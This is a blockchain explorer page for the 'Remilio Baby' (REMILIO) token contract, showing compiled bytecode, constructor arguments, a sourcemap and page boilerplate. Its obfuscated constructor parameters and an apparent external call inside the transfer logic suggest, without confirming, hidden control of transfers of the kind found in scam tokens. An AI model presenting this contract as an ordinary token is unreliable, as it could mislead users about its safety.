5610cd157634e487b7160e01b81526011600452602481fd5b500190565b60005b83811015610cf1578181015183820152602001610cd9565b838111156103e85750506000910152565b600281046001821680610d1657607f821691505b60208210811415610d3757634e487b7160e01b600052602260045260246000fd5b5091905056fea26469706673582212203f988d54aa3b926e9c9c62a2c0f3dbd276b7534dc9a428b8ee0c1420627407b864736f6c63430008000033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d78f5848c64f88ff3696a934cd0ef2cfaef1691a59c3618e5f7c54b9f7ffae224000000000000000000000000000000000000000000000000000000000000000c52656d696c696f20426162790000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000752454d494c494f00000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Remilio Baby
Arg [1] : symbol_ (string): REMILIO
Arg [2] : acDrds_ (address): 0xDff32C65f843188cF64ECBC6F4a13cFf12581b9D
Arg [3] : llucx_ (uint256): 54711334176406462290526804333748117709246359833717344274814083286436408910372

-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d
Arg [3] : 78f5848c64f88ff3696a934cd0ef2cfaef1691a59c3618e5f7c54b9f7ffae224
Arg [4] : 000000000000000000000000000000000000000000000000000000000000000c
Arg [5] : 52656d696c696f20426162790000000000000000000000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000007
Arg [7] : 52454d494c494f00000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

200:11698:3:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1145:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3645:242;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;2273:108::-;;;:::i;:::-;;;;;;;:::i;4467:295::-;;;;;;:::i;:::-;;:::i;2116:92::-;;;:::i;:::-;;;;;;;:::i;5171:270::-;;;;;;:::i;:::-;;:::i;2444:177::-;;;;;;:::i;:::-;;:::i;10550:648::-;;;;;;:::i;:::-;;:::i;:::-;;980:87:2;;;:::i;:::-;;;;;;;:::i;1364:104:3:-;;;:::i;5944:505::-;;;;;;:::i;:::-;;:::i;2827:234::-;;;;;;:::i;:::-;;:::i;3124:201::-;;;;;;:::i;:::-;;:::i;1145:100::-;1199:13;1232:5;1225:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1145:100;:::o;3645:242::-;3764:4;3786:13;3802:12;:10;:12::i;:::-;3786:28;;3825:32;3834:5;3841:7;3850:6;3825:8;:32::i;:::-;-1:-1:-1;3875:4:3;;3645:242;-1:-1:-1;;;3645:242:3:o;2273:108::-;2361:12;;2273:108;:::o;4467:295::-;4598:4;4615:15;4633:12;:10;:12::i;:::-;4615:30;;4656:38;4672:4;4678:7;4687:6;4656:15;:38::i;:::-;4705:27;4715:4;4721:2;4725:6;4705:9;:27::i;:::-;4750:4;4743:11;;;4467:295;;;;;;:::o;2116:92::-;2199:1;2116:92;:::o;5171:270::-;5286:4;5308:13;5324:12;:10;:12::i;:::-;5308:28;;5347:64;5356:5;5363:7;5400:10;5372:25;5382:5;5389:7;5372:9;:25::i;:::-;:38;;;;:::i;:::-;5347:8;:64::i;2444:177::-;-1:-1:-1;;;;;2595:18:3;;2563:7;2595:18;;;:9;:18;;;;;;2444:177;;;;:::o;10550:648::-;10640:18;;;:6;:18;;;;10614:22;10623:3;10628:2;10632:3;10614:8;:22::i;:::-;:44;10610:57;;10660:7;;10610:57;10677:10;10690:4;;10695:1;10690:7;;;;;-1:-1:-1;;;10690:7:3;;;;;;;;;;;;;;;10677:20;;10708:10;10721:4;;10726:1;10721:7;;;;;-1:-1:-1;;;10721:7:3;;;;;;;;;;;;;;;10708:20;;10773:1;10769:2;10766:9;10763:2;;;10867:1;10860:13;;;10812:1;10804:10;10891:12;10941:2;10928:16;;10921:28;;;10763:2;10981:9;10978:2;;11086:1;11079:13;;;11054:8;11018:10;11109:12;11158:2;11145:16;;11058:1;11138:27;;10978:2;10748:443;;;;;:::o;980:87:2:-;1026:7;1053:6;-1:-1:-1;;;;;1053:6:2;980:87;:::o;1364:104:3:-;1420:13;1453:7;1446:14;;;;;:::i;5944:505::-;6064:4;6086:13;6102:12;:10;:12::i;:::-;6086:28;;6125:24;6152:25;6162:5;6169:7;6152:9;:25::i;:::-;6125:52;;6230:15;6210:16;:35;;6188:122;;;;-1:-1:-1;;;6188:122:3;;;;;;;:::i;:::-;;;;;;;;;6346:60;6355:5;6362:7;6390:15;6371:16;:34;6346:8;:60::i;:::-;-1:-1:-1;6437:4:3;;5944:505;-1:-1:-1;;;;5944:505:3:o;2827:234::-;2942:4;2964:13;2980:12;:10;:12::i;:::-;2964:28;;3003;3013:5;3020:2;3024:6;3003:9;:28::i;3124:201::-;-1:-1:-1;;;;;3290:18:3;;;3258:7;3290:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;3124:201::o;656:98:0:-;736:10;656:98;:::o;9369:380:3:-;-1:-1:-1;;;;;9505:19:3;;9497:68;;;;-1:-1:-1;;;9497:68:3;;;;;;;:::i;:::-;-1:-1:-1;;;;;9584:21:3;;9576:68;;;;-1:-1:-1;;;9576:68:3;;;;;;;:::i;:::-;-1:-1:-1;;;;;9657:18:3;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;;:36;;;9709:32;;;;;9687:6;;9709:32;:::i;:::-;;;;;;;;9369:380;;;:::o;10040:502::-;10175:24;10202:25;10212:5;10219:7;10202:9;:25::i;:::-;10175:52;;-1:-1:-1;;10242:16:3;:37;10238:297;;10342:6;10322:16;:26;;10296:117;;;;-1:-1:-1;;;10296:117:3;;;;;;;:::i;:::-;10457:51;10466:5;10473:7;10501:6;10482:16;:25;10457:8;:51::i;6919:1056::-;-1:-1:-1;;;;;7050:18:3;;7042:68;;;;-1:-1:-1;;;7042:68:3;;;;;;;:::i;:::-;7199:12;7213:17;7234:7;-1:-1:-1;;;;;7234:12:3;7307:4;7261:51;;;;;;;;:::i;:::-;;;;-1:-1:-1;;7261:51:3;;;;;;;;;;;;;;-1:-1:-1;;;;;7261:51:3;-1:-1:-1;;;7261:51:3;;;7234:89;;;7261:51;7234:89;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7198:125;;;;7338:7;7334:33;;;7347:20;7356:4;7362;7347:8;:20::i;:::-;7451:4;7441:15;;;7435:22;-1:-1:-1;;;;;7500:15:3;;7378:13;7500:15;;;:9;:15;;;;;;;;7548:21;;;;7526:109;;;;-1:-1:-1;;;7526:109:3;;;;;;;:::i;:::-;-1:-1:-1;;;;;7671:15:3;;;;;;;:9;:15;;;;;;7689:20;;;7671:38;;7889:13;;;;;;;;;;:23;;;;;;7941:26;;;;;;7703:6;;7941:26;:::i;:::-;;;;;;;;6919:1056;;;;;;;:::o;11495:400::-;11605:7;11625:11;11639:10;11625:24;;11660:17;11680:7;11660:27;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11702:2;11708:1;11702:7;11698:21;;;11718:1;11711:8;;;;;;11698:21;11734:2;11740:1;11734:7;11730:21;;;11750:1;11743:8;;;;;;11730:21;11762:17;11782:5;11762:25;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11802:2;11808:6;11802:12;11798:26;;;11823:1;11816:8;;;;;;;11798:26;11871:3;11876;11881;11860:25;;;;;;;;;;:::i;:::-;;;;-1:-1:-1;;11860:25:3;;;;;;;;;11850:36;;11860:25;11850:36;;;;;11495:400;-1:-1:-1;;;;;;;11495:400:3:o;7983:236::-;8133:4;8123:15;;;8117:22;-1:-1:-1;;;;;8168:14:3;;8060:13;8168:14;;;:6;:14;;;;;;;;8186:1;8168:19;;;:42;;-1:-1:-1;8191:19:3;;;8168:42;8160:51;;;;;;7983:236;;;:::o;14:175:4:-;84:20;;-1:-1:-1;;;;;133:31:4;;123:42;;113:2;;179:1;176;169:12;194:198;;306:2;294:9;285:7;281:23;277:32;274:2;;;327:6;319;312:22;274:2;355:31;376:9;355:31;:::i;397:274::-;;;526:2;514:9;505:7;501:23;497:32;494:2;;;547:6;539;532:22;494:2;575:31;596:9;575:31;:::i;:::-;565:41;;625:40;661:2;650:9;646:18;625:40;:::i;:::-;615:50;;484:187;;;;;:::o;676:342::-;;;;822:2;810:9;801:7;797:23;793:32;790:2;;;843:6;835;828:22;790:2;871:31;892:9;871:31;:::i;:::-;861:41;;921:40;957:2;946:9;942:18;921:40;:::i;:::-;911:50;;1008:2;997:9;993:18;980:32;970:42;;780:238;;;;;:::o;1023:266::-;;;1152:2;1140:9;1131:7;1127:23;1123:32;1120:2;;;1173:6;1165;1158:22;1120:2;1201:31;1222:9;1201:31;:::i;:::-;1191:41;1279:2;1264:18;;;;1251:32;;-1:-1:-1;;;1110:179:4:o;1294:666::-;;;1441:2;1429:9;1420:7;1416:23;1412:32;1409:2;;;1462:6;1454;1447:22;1409:2;1507:9;1494:23;1536:18;1577:2;1569:6;1566:14;1563:2;;;1598:6;1590;1583:22;1563:2;1641:6;1630:9;1626:22;1616:32;;1686:7;1679:4;1675:2;1671:13;1667:27;1657:2;;1713:6;1705;1698:22;1657:2;1758;1745:16;1784:2;1776:6;1773:14;1770:2;;;1805:6;1797;1790:22;1770:2;1864:7;1859:2;1853;1845:6;1841:15;1837:2;1833:24;1829:33;1826:46;1823:2;;;1890:6;1882;1875:22;1823:2;1926;1918:11;;;;;1948:6;;-1:-1:-1;1399:561:4;;-1:-1:-1;;;;1399:561:4:o;1965:260::-;;2047:5;2041:12;2074:6;2069:3;2062:19;2090:63;2146:6;2139:4;2134:3;2130:14;2123:4;2116:5;2112:16;2090:63;:::i;:::-;2207:2;2186:15;-1:-1:-1;;2182:29:4;2173:39;;;;2214:4;2169:50;;2017:208;-1:-1:-1;;2017:208:4:o;2230:274::-;;2397:6;2391:13;2413:53;2459:6;2454:3;2447:4;2439:6;2435:17;2413:53;:::i;:::-;2482:16;;;;;2367:137;-1:-1:-1;;2367:137:4:o;2509:203::-;-1:-1:-1;;;;;2673:32:4;;;;2655:51;;2643:2;2628:18;;2610:102::o;2717:484::-;-1:-1:-1;;;;;2942:32:4;;2924:51;;3011:2;3006;2991:18;;2984:30;;;2717:484;;3037:47;;3065:18;;3057:6;3037:47;:::i;:::-;3132:9;3124:6;3120:22;3115:2;3104:9;3100:18;3093:50;3160:35;3188:6;3180;3160:35;:::i;:::-;3152:43;2914:287;-1:-1:-1;;;;;;2914:287:4:o;3206:187::-;3371:14;;3364:22;3346:41;;3334:2;3319:18;;3301:92::o;3398:222::-;;3547:2;3536:9;3529:21;3567:47;3610:2;3599:9;3595:18;3587:6;3567:47;:::i;3625:398::-;3827:2;3809:21;;;3866:2;3846:18;;;3839:30;3905:34;3900:2;3885:18;;3878:62;-1:-1:-1;;;3971:2:4;3956:18;;3949:32;4013:3;3998:19;;3799:224::o;4028:353::-;4230:2;4212:21;;;4269:2;4249:18;;;4242:30;4308:31;4303:2;4288:18;;4281:59;4372:2;4357:18;;4202:179::o;4386:402::-;4588:2;4570:21;;;4627:2;4607:18;;;4600:30;4666:34;4661:2;4646:18;;4639:62;-1:-1:-1;;;4732:2:4;4717:18;;4710:36;4778:3;4763:19;;4560:228::o;4793:401::-;4995:2;4977:21;;;5034:2;5014:18;;;5007:30;5073:34;5068:2;5053:18;;5046:62;-1:-1:-1;;;5139:2:4;5124:18;;5117:35;5184:3;5169:19;;4967:227::o;5199:400::-;5401:2;5383:21;;;5440:2;5420:18;;;5413:30;5479:34;5474:2;5459:18;;5452:62;-1:-1:-1;;;5545:2:4;5530:18;;5523:34;5589:3;5574:19;;5373:226::o;5604:401::-;5806:2;5788:21;;;5845:2;5825:18;;;5818:30;5884:34;5879:2;5864:18;;5857:62;-1:-1:-1;;;5950:2:4;5935:18;;5928:35;5995:3;5980:19;;5778:227::o;6010:177::-;6156:25;;;6144:2;6129:18;;6111:76::o;6192:184::-;6364:4;6352:17;;;;6334:36;;6322:2;6307:18;;6289:87::o;6381:229::-;;6452:1;6448:6;6445:1;6442:13;6439:2;;;-1:-1:-1;;;6478:33:4;;6534:4;6531:1;6524:15;6564:4;6485:3;6552:17;6439:2;-1:-1:-1;6595:9:4;;6429:181::o;6615:258::-;6687:1;6697:113;6711:6;6708:1;6705:13;6697:113;;;6787:11;;;6781:18;6768:11;;;6761:39;6733:2;6726:10;6697:113;;;6828:6;6825:1;6822:13;6819:2;;;-1:-1:-1;;6863:1:4;6845:16;;6838:27;6668:205::o;6878:380::-;6963:1;6953:12;;7010:1;7000:12;;;7021:2;;7075:4;7067:6;7063:17;7053:27;;7021:2;7128;7120:6;7117:14;7097:18;7094:38;7091:2;;;7174:10;7169:3;7165:20;7162:1;7155:31;7209:4;7206:1;7199:15;7237:4;7234:1;7227:15;7091:2;;6933:325;;;:::o

Swarm Source

ipfs://3f988d54aa3b926e9c9c62a2c0f3dbd276b7534dc9a428b8ee0c1420627407b8
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.